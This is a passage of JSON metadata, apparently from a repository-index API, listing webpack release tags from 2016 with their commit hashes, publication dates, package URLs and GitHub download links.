z/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_